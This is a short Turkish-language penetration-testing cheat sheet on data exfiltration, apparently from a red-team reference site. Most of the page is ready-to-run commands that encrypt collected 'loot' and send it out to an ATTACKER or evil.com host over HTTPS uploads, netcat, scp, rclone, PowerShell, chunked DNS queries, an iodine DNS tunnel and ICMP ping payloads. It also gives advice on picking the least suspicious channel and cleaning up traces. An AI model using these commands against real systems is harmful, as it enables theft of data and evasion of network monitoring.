Skip to content

Exfiltration

generic exfil

Loot’u dışarı çıkarmak shell kadar kritiktir. Küçük parçalar, şifreleme ve “normal görünen” protokoller (HTTPS/DNS) tercih edilir.

  1. Outbound hangi port/protokollerin açık olduğunu ölç.

  2. Loot’u sıkıştır/şifrele; boyut ve gürültüyü planla.

  3. En az şüpheli kanalı seç (HTTPS POST, DNS, ICMP).

  4. Bütünlüğü doğrula (hash) ve izleri temizle (RoE’ye göre).

Terminal window
tar czf - /path/loot | openssl enc -aes-256-cbc -salt -pbkdf2 -out loot.enc
Terminal window
7z a -p'pass' loot.7z /path/loot
Terminal window
sha256sum loot.enc
Terminal window
curl -F file=@loot.enc https://ATTACKER/up
Terminal window
curl -T loot.enc http://ATTACKER:8000/
Terminal window
python3 -m http.server 8000 # attacker
Terminal window
iwr -Uri http://ATTACKER/up -Method POST -InFile loot.zip
Terminal window
# parçalı DNS
xxd -p loot.enc | fold -w 60 | while read h; do dig $h.evil.com; done
Terminal window
iodine -f ATTACKER tunnel.evil.com
Terminal window
ping -p $(xxd -p -c 16 chunk.bin) ATTACKER
Terminal window
nc ATTACKER 443 < loot.enc
Terminal window
scp loot.enc user@ATTACKER:/tmp/
Terminal window
rclone copy loot.enc remote:bucket/
[ ] outbound kanal doğrulandı
[ ] loot şifreli/arşivli
[ ] transfer tamam + hash eşleşti
[ ] kanal ve dosya konumları not edildi